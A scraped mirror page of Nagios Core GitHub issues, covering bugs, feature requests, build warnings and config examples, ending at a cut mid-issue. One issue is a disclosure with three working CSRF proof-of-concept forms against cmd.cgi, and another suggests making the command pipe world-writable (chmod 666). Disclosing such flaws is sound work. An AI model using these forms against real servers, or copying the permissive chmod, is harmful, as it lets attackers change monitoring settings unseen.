Giter VIP home page Giter VIP logo

nagioscore's People

Contributors

ageric avatar awiddersheim avatar box293 avatar c-jung avatar caronc avatar cbyers0 avatar ccztux avatar dougnazar avatar dwittenberg2008 avatar dylan-at-nagios avatar emislivec avatar ggvl avatar hedenface avatar iwhite-nagios avatar jakgibb avatar jomann09 avatar jsoref avatar knweiss avatar mejo- avatar mjtrangoni avatar nagiosgwesterman avatar orlitzky avatar pmayers avatar rk295 avatar sawolf avatar ssunganagios avatar tjyang avatar tmcnag avatar tonvoon avatar tsadpbb avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

nagioscore's Issues

Status map in 4.1 rc1 doubled host with more parents

Hi

I have host with two parents in my test nagios configuration.

define host {
hostname a
}

define host {
hostname b
parents a
}

define host {
hostname c
parents a,b
}

define host {
hostname d
parents c
}

There were two lines from host c in previous version of Nagios.
New version of status map displays host c (with his child d) two times. The graph of network is now confusing.

Pozda

Core 4.0.8 jsonquery.php 404 not found

Reference: Nagios Support Forum post 32973 for details.

Issue
The initial screen of jsonquery.html prompts the user to select from one of the 3 GGI's: Archive, Object or Status. Selecting either one can produce a screen with their selection, and ONLY the "SEND QUERY" button for a period of time -- that is, the background processing to obtain the object data and update the screen with further selection Options can be delayed -- for several seconds, perhaps up to 10 seconds. Yet, the "SEND QUERY" button is live the entire time, and a user not familiar with the application can press "SEND QUERY" prematurely, and receive an error jsonquery.php 404 not found.

Our Nagios Core systems are not very large: we have 130+ hosts, with ~5600 services on a decent sized multi-cpu Linux server. However, there can be sufficient lag of several seconds (as described above) to present the user with a screen that leads them to believe the next step is to hit "SEND QUERY" without knowing further selection options will eventually be painted on the screen.

Suggestion: Gray out the "SEND QUERY" button until the background processing has filled any list boxes, and the user has made at least some selection from the new options.

Unable to sort mutliple pages of services by duration down

So we have multiple pages of services flagged with problems, mainly APs and modems etc, and I would like to work from the longest duration flagged towards to shortest. If I click on problems under the current status menu on the left hand side, although I can sort the first page by duration ascending, if I then go on to the second page the sort order is reset, and if I try to counter this by selecting sort by duration ascending I am brought back to the first page. Further, if while on the first page I select order by duration ascending and then select limit results to all or say 250, the sort order is also reset. The same happens if I limit the number first and then select sort by duration ascending.

Basically I can sort by duration ascending, but only the first page.

Please address this, thanks.

Security Vulnerability Report

Hello Nagios Team,

I am Madhu Akula an independent Security Researcher, Contacting you to disclose about Security Vulnerabilities in your Nagios Product.

Bug Title       : Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities
Reporter Name   : Madhu Akula
Product         : Nagios
Version         : All Versions
Modules         : Nagios Web Interface
Tested On       : Windows, Linux, Mac
Browsers        : Firefox, Chrome, IE and all other also
Priority        : High
Severity        : Critical

Summary :

Multiple Stored CSRF Vulnerabilities leads to delete and add comments, changing the settings of the Nagios server and some advanced attacks.

_Description :_

About Vulnerability :

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.

Impact :

Attackers can trick victims into performing any state changing operation the victim is authorized to perform, e.g., deleting and adding details like comments and logs, Changing the settings as well.

For more reference :

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Effect of Vulnerability (Proof Of Concept - PoC) :

  • Deleting All comments :-
<html>
  <body>
    <form action="http://localhost/nagios/cgi-bin/cmd.cgi" method="POST">
      <input type="hidden" name="cmd&#95;typ" value="21" />
      <input type="hidden" name="cmd&#95;mod" value="2" />
      <input type="hidden" name="host" value=“hostname” />
      <input type="hidden" name="service" value="Current&#32;Load" />
      <input type="hidden" name="btnSubmit" value="Commit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Adding comments :-
<html>
  <body>
    <form action="http://localhost/nagios/cgi-bin/cmd.cgi" method="POST">
      <input type="hidden" name="cmd&#95;typ" value="3" />
      <input type="hidden" name="cmd&#95;mod" value="2" />
      <input type="hidden" name="host" value=“hostname” />
      <input type="hidden" name="service" value="Current&#32;Load" />
      <input type="hidden" name="persistent" value="on" />
      <input type="hidden" name="com&#95;data" value="another&#32;comment" />
      <input type="hidden" name="btnSubmit" value="Commit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Changing Settings :-
<html>
  <body>
    <form action="http://localhost/nagios/cgi-bin/cmd.cgi" method="POST">
      <input type="hidden" name="cmd&#95;typ" value="68" />
      <input type="hidden" name="cmd&#95;mod" value="2" />
      <input type="hidden" name="hostgroup" value="linux&#45;servers" />
      <input type="hidden" name="ahas" value="on" />
      <input type="hidden" name="btnSubmit" value="Commit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Note : In the local host place replace with server IP address, where hostname place replace the server which you want to delete the comments, currently I am deleting Current Load comments. We can also delete any other kind of comments as well.

Recommendations :

Preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.

https://www.owasp.org/index.php/CSRF_Prevention_Cheat_Sheet

Send alert messages through Followzup, instead of SMS

The purpose of this feature request is to enable sending alert messages through the service followzup, instead of sending with SMS. The service is an open protocol communication service, designed to support alert messages sent to the cell phones.
The process begin with the creation of a channel information (private or public), through which the messages are sent. Once created, the administrator downloads the channel's request function (PHP file) used to assist Nagios requests, which must be "included" by Nagios send-message script.
At last, Nagios calls the request function, with the message's text to be sent. Once requested, the message is redirected to the administrator's cell phone (source: followzup.com).
As the service is a cheap alternative for resources managers, I would like you to please, add this feature to Nagios, showing where the followzup function must be stored and the customized script to send messages through this function.

"Related to the post sent to Nagios Support Forum (Fri Jun 26, 2015 3:38 pm), under the title: Send alert messages through followzup, instead of SMS", and oriented by Nagios Sales Tech.

Inconsistent output when using % signs

Imported from the forums (user: jssingh): http://support.nagios.com/forum/viewtopic.php?f=34&t=27592

Text of issue below:

I have some output that is killing the JSON when it has % signs, which seemed odd to me that percent signs alone would kill the JSON, so I decided to test it out and the output I'm getting is wildly inconsistent (but interesting). In the examples below, I see the output correctly in the HTML page (cgi-bin/extinfo.cgi). The first one is the example of when it works correctly.

Input:
Group Share% Use

JSON Output:
"Group Share% Use"

Input:
Group Share% Use% Share

JSON Output:
"Group Share% Use�����hare"

Input:
Group Share% Use% hare

JSON Output:
"Group Share% Use 0x0.000300000003p-1022re"

Input:
Group 90%

JSON Output:
""

Input:
Testing % sign

JSON Output:
"Testing `֞ign"

Any ideas? I'm using commit 6081644, but I had this problems with % signs when I was using 4.0.4 and 4.0.7 (the release from last week).

Bogus log messages 'Unknown jobtype: 10' when using process_performance_data (service_perfdata_command/host_perfdata_command)

Cross Post from Tracker:
http://tracker.nagios.org/view.php?id=534
Reporter: ovidiu_stanila

When using service_perfdata_command or host_perfdata_command configuration Nagios logs a warning message for each service/host check. These warning messages look like:
[1383116400] Worker 1277: Unknown jobtype: 10
[1383116400] wproc: Unknown job type: 10
[1383116400] Worker 1279: Unknown jobtype: 10
[1383116400] wproc: Unknown job type: 10
[1383116400] Worker 1278: Unknown jobtype: 10
[1383116400] wproc: Unknown job type: 10

User Submitted patch:

http://tracker.nagios.org/file_download.php?file_id=205&type=bug

command pipe corruption writing to nagios.cmd

What I found was, if you didn't submit he command with a "\n" at the end then it wouldn't work but was "appended/kept in the buffer" and then later when a correct command was issued the previous kept information was also submitted.

You can see the location of "\n" in the following example:

now_epoch=$(eval date +%s); printf "[$now_epoch] ADD_HOST_COMMENT;centos03;1;nagiosadmin;This host does funny stuff\n" > /usr/local/nagios/var/rw/nagios.cmd

I think it would be prudent to clear out the contents of the buf variable in command_input_handler after each process_external_command1 run. It's certainly not ideal to have corruption pop up at all, but I don't see any reason to keep bogus commands around in that variable to (possibly) be executed later.

see http://support.nagios.com/forum/viewtopic.php?f=7&t=31900

Enable json api to find empty hostgroups etc

Hello,
It seems the json api does not find empty hostgroups, which can be very confusing while scripting. For example someone makes a new hostgroup for an application. Automated script are looping through all hostgroups to assign them, but don't find the empty hostgroups.
Workaround would be to assign a dummy host while creating the hostgroup, but this is 'sloppy' work imho. Enabling the json api to find empty hostgroups would the 'logical' step.
Grtz
Willem

[feature-request] Nagios contacts case-insensitive

I use LDAP for authorization in GUI. Users (contacts and their groups) associated with the hosts/services.
When user input for example "Petr" and own ldap password, he loggined but can't see any information.
When user input "petr" (as specidied in contacts.cfg), rhen everything OK - he can see information.

Could you please add possibility to use case-insensitive contacts for user authorization?

More information discribed here: http://support.nagios.com/forum/viewtopic.php?f=34&t=33478

Backslashes disappear

When plugins output includes backslashes, disappear from status information. Is this by design?

e.g. check_disk_smb

Disk ok - xxG(xx%) free on \\192.0.2.1\share
-> Disk ok - xxG(xx%) free on \192.0.2.1share

small typo in the statusjson.cgi output

Discovered by Sven-Göran Bergh over on the nagios forums:

http://support.nagios.com/forum/viewtopic.php?t=31550#127813

--- statusjson.c.orig   2015-02-18 14:14:58.000000000 +0100
+++ statusjson.c        2015-02-24 09:46:53.257050393 +0100
@@ -3482,7 +3482,7 @@
                        &percent_escapes, temp_servicestatus->long_plugin_output);
        json_object_append_string(json_details, "perf_data", &percent_escapes,
                        temp_servicestatus->perf_data);
-       json_object_append_integer(json_details, "max_attemps",
+       json_object_append_integer(json_details, "max_attempts",
                        temp_servicestatus->max_attempts);
        json_object_append_integer(json_details, "current_attempt",
                        temp_servicestatus->current_attempt);

configuring with empty --with-htmurl= leads to images loading problem

I want run my nagios without /nagios context.
My configuration options are:
./configure --with-nagios-user=nagios --with-command-group=nagioscmd --with-htmurl='' --with-cgiurl='/cgi-bin'

At the end of configuration there is ..

Web Interface Options:


             HTML URL:  http://localhost/
              CGI URL:  http://localhost/cgi-bin/

Looks GOOD!

Next make all, make install, make install-commandmode, make install-config etc

Virtual Host configuration:

<VirtualHost *:80>
ServerAdmin admin@MY_DOMAIN
ServerName nagios.MY_DOMAIN

DocumentRoot /usr/local/nagios/share
<Directory />
    Options FollowSymLinks
    AllowOverride None
</Directory>

ScriptAlias /cgi-bin "/usr/local/nagios/sbin"

<Directory "/usr/local/nagios/sbin">
    Options ExecCGI
    AllowOverride None
    Order allow,deny
    Allow from all
    AuthName "Nagios Access"
    AuthType Basic
    AuthUserFile /usr/local/nagios/etc/htpasswd.users
    Require valid-user
</Directory>
<Directory "/usr/local/nagios/share">
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all
    AuthName "Nagios Access"
    AuthType Basic
    AuthUserFile /usr/local/nagios/etc/htpasswd.users
    Require valid-user
</Directory>

ErrorLog ${APACHE_LOG_DIR}/nagios/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/nagios/access.log combined

All above leads to nagios looks like this:

nagios

SOLITION:
Edit etc/cgi.cnf and set url_html_path to "/"

url_html_path=/

Instalation script leaves it blank which is not correct.

Nagios 4 (4.10 RC1) Startup (SuSE 13.2)

Recently upgraded a 3.5.1 machine to 4.1RC1, and I thought everything was OK until last Friday when there was a power issue; the server rebooted and Nagios did not start. Found a number of posts on the Forum that the init.d script is only valid on Debian, .. but nothing in the past 18 months. Is there an init script flavor for SuSE (or RH)?

Warming messages from gcc-4.9.2 compiler

This is on fedora 21 with gcc-4.9.2

[nagiosbuild@fedora21 nagioscore]$ grep warning compile.txt
nebmods.c:109:21: warning: assignment from incompatible pointer type
commands.c:2248:12: warning: assignment discards ‘const’ qualifier from pointer target type
commands.c:2341:12: warning: assignment discards ‘const’ qualifier from pointer target type
utils.c:1117:6: warning: assuming signed overflow does not occur when assuming that (X + c) >= X is always true [-W\
strict-overflow]
../common/downtime.c:194:13: warning: ‘downtime_remove’ defined but not used [-Wunused-function]
jsonutils.c:525:3: warning: second parameter of ‘va_start’ not last named argument [-Wvarargs]
archivejson.c:3037:8: warning: variable ‘object’ set but not used [-Wunused-but-set-variable]
archivejson.c:3030:6: warning: variable ‘last_service_state’ set but not used [-Wunused-but-set-variable]
archivejson.c:3029:6: warning: variable ‘last_host_state’ set but not used [-Wunused-but-set-variable]
objectjson.c:605:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
objectjson.c:1294:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:734:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:1278:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
nebmods.c:109:21: warning: assignment from incompatible pointer type
commands.c:2248:12: warning: assignment discards ‘const’ qualifier from pointer target type
commands.c:2341:12: warning: assignment discards ‘const’ qualifier from pointer target type
utils.c:1117:6: warning: assuming signed overflow does not occur when assuming that (X + c) >= X is always true [-W\
strict-overflow]
../common/downtime.c:194:13: warning: ‘downtime_remove’ defined but not used [-Wunused-function]
jsonutils.c:525:3: warning: second parameter of ‘va_start’ not last named argument [-Wvarargs]
archivejson.c:3037:8: warning: variable ‘object’ set but not used [-Wunused-but-set-variable]
archivejson.c:3030:6: warning: variable ‘last_service_state’ set but not used [-Wunused-but-set-variable]
archivejson.c:3029:6: warning: variable ‘last_host_state’ set but not used [-Wunused-but-set-variable]
objectjson.c:605:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
objectjson.c:1294:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:734:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
statusjson.c:1278:6: warning: variable ‘whitespace’ set but not used [-Wunused-but-set-variable]
[nagiosbuild@fedora21 nagioscore]$ 

Following pointer like following looks like a solution.

http://unix.stackexchange.com/questions/144454/linux-2-6-36-4-gcc-4-7-2-getting-lots-of-variable-set-but-not-used-warnings

diff --git a/cgi/archivejson.c b/cgi/archivejson.c
index 8675dd6..0cd5664 100644
--- a/cgi/archivejson.c
+++ b/cgi/archivejson.c
<snipped>
-       int whitespace;
+       int whitespace __attribute__ ((unused));

[feature-request] Spoiler in Problems page

Could you please add spoiler to Parent-service on Probles page when Parent-service is down and Parent-service has more then 3 children? When each unstable host has 10-15 service checks it's not very comfortably to see on Problems page when a lot of hosts is down In large systems.
It would be clever to hide children-services under spoiler and expand them only if needed.
"Expand All" button and "Allways Expand All" setting need also.

[feature-request] Allow scheduled enable/disable for notifications

As described in the support forums (http://support.nagios.com/forum/viewtopic.php?f=7&t=33376&p=142286) it would be nice to have the same functionality already existing in scheduled downtime for checks replicated for notifications disable.

As explained in the link above, some times we disable the notifications temporarily to run some tests and avoid spamming our users, but we later forget to re-enable them.

It seems to me like it would be fairly easy to apply the same logic as for scheduled downtimes also for the notifications disable feature, thus allowing us to set a specified amount of time for disabling alerts within a given timeframe, letting itself reactivate later.

HUP seems to cause nagios to stop talking to external queryhandlers

Not sure what causes this, but I see under strace that nagios unlink()s the filesystem end of the queryhandler socket and restarts its own workers with kill(), but my external worker (a fast SNMP checker) stops receiving queries after a HUP.

I can workaround this with a timeout but it's messy. Is nagios supposed to retain workers across HUP and if so, what should I look for?

Issue with Check scheduling

Request:
Possibility to disable new feature from 4.0.8 [Check scheduling has been modified to prevent bunching checks at the start of their timeperiod]

Description:
After upgraded core to version 4.0.8. Nagios is schedulling checks randomly within allowed time frame. This is by design as described in release notes but would be nice to have poosibility to disable this.

Release notes for 4.0.8:
-JSON API output has been better aligned with the standard, and output size limits have been lifted
-Check scheduling has been modified to prevent bunching checks at the start of their timeperiod
-Auto-rescheduling of checks has been reimplemented. This can be enabled by setting auto_reschedule_checks=1 in nagios.cfg, and adjusted by setting auto_rescheduling_interval and auto_rescheduling_window as described in the Core 4 Documentation. Auto-rescheduling smoothes the check schedule as it changes over time, and together with the previous improvements, helps to give a more uniform system load.

Problem which I am facing is that I have some checks scheduled once a day and with core 4.0.6 those checks have been runing always at precise time eg. 06:30 am. Now they are executed randomly at 06:43 06:37 etc. I would like to have possibility that Nagios will schedule automatically at precise time 06:30. Is possible to set this somehow implement switch for [check schedulling] which will disable this feature?

This is direct follow up of thread from Nagios Support forum:
http://support.nagios.com/forum/viewtopic.php?f=7&t=31266

[feature-request] Service (or host) checks should allow SOFT status for OK as well

So we have the concept of a SOFT status when a check enters a non-ok state. We can define our checks to be considered as HARD directly, by means of setting only 1 check to trigger an alert.

However, returning the check to an OK state is sort-of HARD only. Any check returning an OK value will be considered by Nagios as a HARD status and therefore immediately trigger a notification setting the problem as resolved.

I think there are some cases where we want the return to OK to be also able to make use of the SOFT status, requiring, for example, 5 OK checks for the service to be considered back to OK state.

I have heard all sort of solutions, using flapping detection being probably the most sensible one. I still dislike doing that since acknowledgements (with non-permanent notes) will be lost when the service flaps to OK and back to critical.

For my users in particular this is extremely inconvenient and they complain all the time to the point they stop using acknowledgement functionality and even completely ignoring nagios alerts.

It would be great to have this functionality which I believe makes complete sense since it is already present for transitions from OK to NON-OK status.

New map not working for RU locale

I have Firefox with RU default locale. When I try to open the new Nagios Map (legacy map work fine) it is not shown (only button with three lines and loading circle for some seconds) and i see JSON.parser error in developer console.
When I change intl.accept_languages to "en-US, en" in my Firefox then map work fine.

Bug - Core 4.0.8 and Service Dependency

This was reported in the forums and affects Core 4.0.8.

http://support.nagios.com/forum/viewtopic.php?f=16&t=29205&p=112139#p112139

Problem:

When hostgroups are used for the hostgroup_name directive, the service dependency appears to be ignored. This does not matter if the host's are assigned to the hostgroup via their host object definition OR inside the hostgroup definition.

When I say ignored, when the Master service goes down, core continues to check the services depending on it. If these are down then notifications are sent.

When I tail nagios.log I can see the notifications.

When using Core 3.5.1, when the Master service goes down, core DOES NOT continue to check the services depending on it. The next check time keeps getting pushed back.

The following config settings can be used to reproduce the issue:

define host{
use linux-server
host_name host1
alias host1
address 127.0.0.1
hostgroups my_test
}

define host{
use linux-server
host_name host2
alias host2
address 127.0.0.1
hostgroups my_test
}

define command{
command_name check-host-alive-specific
command_line $USER1$/check_ping -H $ARG1$ -w 3000.0,80% -c 5000.0,100% -p 5
}

define service{
use local-service
host_name host1
service_description master
check_command check-host-alive-specific!192.168.207.142
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host1
service_description one
check_command check-host-alive-specific!192.168.207.143
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host1
service_description two
check_command check-host-alive-specific!192.168.207.144
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host2
service_description master
check_command check-host-alive-specific!192.168.207.130
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host2
service_description one
check_command check-host-alive-specific!192.168.207.128
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define service{
use local-service
host_name host2
service_description two
check_command check-host-alive-specific!192.168.207.131
max_check_attempts 2
check_interval 1
retry_interval 1
flap_detection_enabled 0
notification_period 24x7
notifications_enabled 1
}

define hostgroup {
hostgroup_name my_test
alias my_test
}

When done this way, it works

define servicedependency {
dependent_host_name host1,host2
dependent_service_description one,one,two,two
host_name host1,host2
service_description master
inherits_parent 1
execution_failure_criteria u,c,p,
notification_failure_criteria u,c,p,
dependency_period 24x7
}

When done this way, it works

define servicedependency {
dependent_hostgroup_name my_test
dependent_service_description one,one,two,two
host_name host1,host2
service_description master
inherits_parent 1
execution_failure_criteria u,c,p,
notification_failure_criteria u,c,p,
dependency_period 24x7
}

When done this way, it DOES NOT work

define servicedependency {
dependent_hostgroup_name my_test
dependent_service_description one,one,two,two
hostgroup_name my_test
service_description master
inherits_parent 1
execution_failure_criteria u,c,p,
notification_failure_criteria u,c,p,
dependency_period 24x7
}

Empty check_timeperiod on active checks can cause rescheduling log spam

Tested on core 4.0.8.
To reproduce:

Create a host with active checks enabled and a timeperiod like:

define timeperiod {
timeperiod_name none
alias No Time Is A Good Time
}

Now stop the nagios service, delete retention.dat, and then restart nagios. Afterwards, force an immediate check. Once checked, it will schedule the next check based on its interval. From here on, it will continue to try to check, fail due to the timeperiod, but reschedule it even though the time period is empty. Every time it tries to check, it will spam your logs with:

Warning: Check of host 'xxxx' could not be rescheduled properly. Scheduling check for [xxx]

I would argue that the check should not be rescheduled at all it nagios cannot find a valid time period to do so instead of defaulting to rescheduling the check on the next the check_interval.

archivejson.cgi returns wrong host for state change query

To reproduce:
Use the jsonquery.html tool. Select:

  1. Archive JSON
  2. Host - Any available host.
  3. Any valid start/end time
  4. Submit query. The last state change in the list is not from the same host as specified in the query. This happens whether or not there were any valid results for the specified host (i.e. the last state change entry is always incorrect and rather random). It is easy to filter out of the response in the ajax success method, but is not working as intended none the less.

Cheers!

nagios 4.0.6 - init script bug

I posted this on the forum, and I was told to repost it here.

I'm compiling Nagios 4.0.6 from source in a CentOS 6 environment in which I don't have root or sudo privileges. Therefore, Nagios only has a few users, groups, and directories it can work with.

I compiled with the following:

./configure --prefix=/opt/nagios --with-nagios-user=monitor --with-nagios-group=monitor --with-command-user=monitor --with-command-group=monitor --with-init-dir=/home/monitor/scripts --with-lockfile=/home/monitor/nagios.lock --with-httpd-conf=/home/monitor/conf/httpd
make all
make install
mkdir -p /home/monitor/scripts
make --ignore-errors install-init
make install-commandmode
make install-config
mkdir -p /home/monitor/conf/httpd
make --ignore-errors install-webconf
make install-exfoliation

Then I try to start nagios, and get permission denied errors:

> bash /home/monitor/scripts/nagios start
Starting nagios: /home/monitor/scripts/nagios: line 89: /var/run/nagios.configtest: Permission denied
chmod: cannot access `/var/run/nagios.configtest': No such file or directory
touch: cannot touch `/var/lock/subsys/nagios': Permission denied

There seems to be several places in the init script that ignore configure flags and opt for the standard Red Hat locations instead. Some examples:

  • Line 63: NagiosLockDir is set to "/var/lock/subsys" despite setting --with-lockfile during configure.
  • Line 89-90, 97-98, 105-106: Config test tries to work with /var/run/nagios.configtest, despite setting --with-prefix during configure.

For my current setup, I can obviously alter the init script to make it work for myself. But I thought I would report this bug, so you could fix it in future releases.

RC 4.1.0 - install instructions will need to include installing unzip

While running 'make all' on a CentOS 6.6 machine I came across this:

make[1]: Entering directory `/tmp/nagios-4.1.0rc1/html'
(cd angularjs && unzip angular-1.3.9.zip)
/bin/sh: unzip: command not found
make[1]: *** [all] Error 127
make[1]: Leaving directory `/tmp/nagios-4.1.0rc1/html'
make: *** [all] Error 2

Doing:

yum -y install unzip

Allowed 'make all' to complete successfully.

json service list not escaped

http://nagios.server/nagios/cgi-bin/statusjson.cgi?query=servicelist produces some invalid json for my configuration:

{ "format_version": 0, "result": { "query_time": 1403606999000, "cgi": "statusjson.cgi", "user": "pricechild", "query": "servicelist", "query_status": "beta", "program_start": 1403606521000, "last_data_update": 1403606990000, "type_code": 0, "type_text": "Success", "message": "" }, "data": { "selectors": { }, "servicelist": { "windowsserver1": { "C:\ Drive Space": 2, "Host Alive": 2, "Memory Usage": 2, "NSClient++ Version": 2 }, } } }

The backslash in "C:\ Drive Space" should be escaped?

This service was created with service_description C:\ Drive Space which I think has been allowed so far.

I imagine there may be further escaping issues to find?

init script bug

Using Centos 6.5,. after installation, Nagios 4.0.8 will fail while attempting to run a service check with:

"Could not open command file '/usr/local/nagios/var/rw/nagios.cmd' for update!"

To fix this, while Nagios is running, Ill have to run:

chmod 666 /usr/local/nagios/var/rw/nagios.cmd

To automatically do this at every 'service nagios start' i've added it to the init script with:

sed -i '/$NagiosBin -d $NagiosCfgFile/a (sleep 10; chmod 666 \/usr\/local\/nagios\/var\/rw\/nagios\.cmd) &'  /etc/init.d/nagios

I'm sure you can figure a way to fix that more properly, but that's what works on Centos 6.5

Command worker fails to handle SIGPIPE

In a loaded Nagios server, a process can write an external command and terminate before it gets a response back. So the write call in https://github.com/NagiosEnterprises/nagioscore/blob/master/base/commands.c#L222 will cause a SIGPIPE that is not handled:

Program received signal SIGPIPE, Broken pipe.
0x00007fe4d18bffd0 in __write_nocancel () at ../sysdeps/unix/syscall-template.S:82
82  in ../sysdeps/unix/syscall-template.S
(gdb) bt
#0  0x00007fe4d18bffd0 in __write_nocancel () at ../sysdeps/unix/syscall-template.S:82
#1  0x00007fe4d22e5eb1 in command_file_worker (sd=47) at commands.c:222
#2  launch_command_file_worker () at commands.c:290
#3  0x00007fe4d22d274f in main (argc=<optimized out>, argv=<optimized out>) at nagios.c:787
(gdb)

After handling the signal in debugger with (gdb) handle SIGPIPE nostop noprint pass to continue execution, things are working as normal - command worker should really handle a failing write() call back to client.

"make dox" warning messages

Hi

make dox in git master branch was able to generate Documenation directory, but currently there are a few warning message. Can these warning message be fixed ?

[tjyang@fedora21 nagioscore]$ make dox
doxygen doxy.conf
/home2/tjyang/nagioscore/lib/fanout.h:66: warning: expected whitespace after [ command
/home2/tjyang/nagioscore/lib/fanout.h:65: warning: The following parameters of fanout_remove(fanout_table *t, unsigned long key) are not documented:
  parameter 'key'
/home2/tjyang/nagioscore/lib/runcmd.h:68: warning: argument 'cmdstring' of command @param is not found in the argument list of runcmd_open(const char *cmd, int *pfd, int *pfderr, char **env, void(*iobreg)(int, int, void *), void *iobregarg)
/home2/tjyang/nagioscore/lib/runcmd.h:68: warning: The following parameters of runcmd_open(const char *cmd, int *pfd, int *pfderr, char **env, void(*iobreg)(int, int, void *), void *iobregarg) are not documented:
  parameter 'cmd'
/home2/tjyang/nagioscore/lib/squeue.h:118: warning: argument 'when' of command @param is not found in the argument list of squeue_change_priority_tv(squeue_t *q, squeue_event *evt, struct timeval *tv)
/home2/tjyang/nagioscore/lib/squeue.h:118: warning: The following parameters of squeue_change_priority_tv(squeue_t *q, squeue_event *evt, struct timeval *tv) are not documented:
  parameter 'tv'
[tjyang@fedora21 nagioscore]$ 

Map no longer loads custom icons in Nagios Core 4.1.0-rc1

I was just testing the new map features in nagios 4.1.0-rc1 and noticed all my icons are gone.

I have them defined like this:

define host{
            use                     linux-server
            host_name               somehost
    ...
            icon_image              custom/esxiserver.png
            statusmap_image         custom/esxiserver.gd2
}

This works fine in 4.0.8 icons load everywhere (host lists, group lists, map, etc.) but in 4.1 they are gone from the map view (loadin ok in lists).

Originally reported by me here: http://support.nagios.com/forum/viewtopic.php?f=34&t=31512

Segmentation fault - RHEL 7 / CENTOS 7

Hi, Try start a Nagios 4.1RC or 4.0.8 in Centos7 but after start get error um Message log:

Jun 26 18:17:10 svdf01238 kernel: nagios[48797]: segfault at 0 ip 00007f29d992158c sp 00007fff782cb728 error 4 in libc-2.17.so[7f29d98a1000+1b6000]

In debug:

[1435353430.934346] [2048.2] [pid=48797] Processing macro 155 of 156
[1435353430.934348] [2048.2] [pid=48797] Grabbing value for macro: HOSTANDSERVICESIMPORTANCE
[1435353430.934351] [2048.2] [pid=48797] Adding macro "HOSTANDSERVICESIMPORTANCE" with value "0" to kvvec
[1435353430.934354] [001.2] [pid=48797] add_macrox_environment_vars_r() end
[1435353430.934357] [001.1] [pid=48797] add_argv_macro_environment_vars_r()
[1435353430.934370] [001.1] [pid=48797] add_custom_macro_environment_vars_r()
[1435353430.934379] [001.1] [pid=48797] add_contact_address_environment_vars_r()
[1435353430.934437] [001.0] [pid=48797] clear_volatile_macros_r()

In process started:

Successfully launched command file worker with pid 49466
Segmentation fault

Packs um Centos 7 👍

glibc-headers-2.17-78.el7.x86_64
libcom_err-devel-1.42.9-7.el7.x86_64
glibc-common-2.17-78.el7.x86_64
libcap-2.22-8.el7.x86_64
libcap-ng-0.7.3-5.el7.x86_64
glibc-2.17-78.el7.x86_64
glibc-devel-2.17-78.el7.x86_64
libcom_err-1.42.9-7.el7.x86_64

command_line with $ breaks $ARGn$ macros

A basic auth password had a single $ in it. This lead to unexpected breakage of $ARGn$

define service {                                                                                      
  service_description example.com-exceptions                                                         
  host example.com                                                                         
  use generic-service                                                                                 
  check_command check_graphite_data!sumSeries(stats.example-com-*.action_controller.status.5*)!1!5!30
}
define command {                                                                             
    command_name check_graphite_data                                                         
    command_line echo 'http://user:[email protected]/$ARG1$' -w $ARG2$ -c $ARG3$ -s $ARG4$
}

The above configuration snippet generated the following:
screen shot 2015-06-29 at 6 12 54 pm

I expected:

